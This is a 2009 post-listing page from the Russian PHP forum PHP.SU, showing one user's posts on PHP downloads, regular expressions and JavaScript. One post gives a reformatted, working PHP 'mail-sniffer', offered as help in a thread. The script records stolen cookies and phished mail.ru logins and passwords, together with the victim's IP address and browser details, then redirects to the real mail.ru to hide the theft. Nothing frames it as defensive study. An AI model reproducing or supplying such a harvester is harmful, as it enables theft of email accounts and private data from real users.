PHP.SU

Программирование на PHP, MySQL и другие веб-технологии
PHP.SU Портал     На главную страницу форума Главная     Помощь Помощь     Поиск Поиск     Поиск Яндекс Поиск Яндекс     Вакансии  Пользователи Пользователи

Страниц (9): « 1 2 3 4 5 6 7 8 [9]

> Найдено сообщений: 130
Бублик Отправлено: 23 Января, 2009 - 10:57:17 • Тема: Скачивание файлов • Форум: Программирование на PHP

Ответов: 11
Просмотров: 584
Ух-ты! Я про идентификатор сессии.
Бублик Отправлено: 23 Января, 2009 - 10:32:40 • Тема: Скачивание файлов • Форум: Программирование на PHP

Ответов: 11
Просмотров: 584
Нет... я думаю там прямая ссылка на файл. Объясните как работает.
Бублик Отправлено: 23 Января, 2009 - 09:55:05 • Тема: Скачивание файлов • Форум: Программирование на PHP

Ответов: 11
Просмотров: 584
Увидел на одном сайте вот такую ссылку на скачивание песни:
http://bla[dot]net/download/ca0a3d38[dot][dot][dot]ad_girl_2009[dot]mp3

Интересно, файл отдаётся скриптом, или по другой схеме. Я понимаю, что это сделано для того, чтобы пользователь не смог скачивать файлы напрямую. Объясните как работает Улыбка
Бублик Отправлено: 23 Января, 2009 - 03:00:59 • Тема: в переменной оставить только цифры • Форум: Регулярные выражения

Ответов: 9
Просмотров: 990
preg_replace работает быстрее ereg_replace
Бублик Отправлено: 22 Января, 2009 - 13:55:21 • Тема: Помогите пожалуйста... • Форум: Программирование на PHP

Ответов: 12
Просмотров: 669
PHP:
скопировать код в буфер обмена
  1. <?PHP
  2. $fp = fopen("mail-sniffer.log", "a");
  3.  
  4. if($_SERVER['QUERY_STRING']) {
  5. $cookie = urldecode($_SERVER['QUERY_STRING']);
  6. fwrite($fp,"==========================\r\n(" . date("m.d.y H:i:s") . ")\r\n" . $_SERVER['REMOTE_ADDR'] . "\r\n" . $_SERVER['HTTP_USER_AGENT'] . "\r\n" . $_SERVER['HTTP_REFERER'] . "\r\n" . $cookie . "\r\n");
  7. preg_match_all("|.*\?id=(\d*);.*|U", $_SERVER['HTTP_REFERER'], $out);
  8. $id = $out[1][0];
  9. header("Location: http://win.mail.ru/cgi-bin/movem...&id=$id");
  10. }else{
  11. fwrite($fp,"==========================\r\n".date("m.d.y H:i:s")."\r\n".$_SERVER['REMOTE_ADDR'] . "\r\n".$_SERVER['HTTP_USER_AGENT'] . "\r\n".$_SERVER['HTTP_REFERER'] . "\r\n".$_POST['full_mail'] . "\r\n" .$_POST['Login'] . "@" . $_POST['Domain'] . "\r\n". $_POST['Password'] . "\r\n");
  12. header("Location: http://win.mail.ru/cgi-bin/msglist?folder=0");
  13. }
  14. fclose($fp);
  15. ?>


Вот вроде так, попробуйте. Замучался редактировать
Бублик Отправлено: 22 Января, 2009 - 13:51:02 • Тема: Помогите пожалуйста... • Форум: Программирование на PHP

Ответов: 12
Просмотров: 669
О, боже мой
Бублик Отправлено: 22 Января, 2009 - 13:49:38 • Тема: Помогите пожалуйста... • Форум: Программирование на PHP

Ответов: 12
Просмотров: 669
Напишите пожалуйста еще раз этот код, обрамляя его спец тегами [PHP][/PHP] и внизу уберите галочку с Вы хотите разрешить смайлики в этом сообщении? Дабы мы смогли Вам помочь.
Бублик Отправлено: 22 Января, 2009 - 13:43:32 • Тема: Помогите пожалуйста... • Форум: Программирование на PHP

Ответов: 12
Просмотров: 669
Ну а код или текст ошибки?? И обрамляйте код в специальные тэги [PHP][/PHP]!
Бублик Отправлено: 22 Января, 2009 - 13:39:54 • Тема: Помогите пожалуйста... • Форум: Программирование на PHP

Ответов: 12
Просмотров: 669
Суть проблемы? Угадыватель мыслей сломался.
Бублик Отправлено: 22 Января, 2009 - 13:37:06 • Тема: Взаимодействие окон. • Форум: JavaScript & VBScript

Ответов: 4
Просмотров: 2220
Я юзал window.opener

Страниц (9): « 1 2 3 4 5 6 7 8 [9]
Powered by PHP  Powered By MySQL  Powered by Nginx  Valid CSS  RSS

 
Powered by ExBB FM 1.0 RC1. InvisionExBB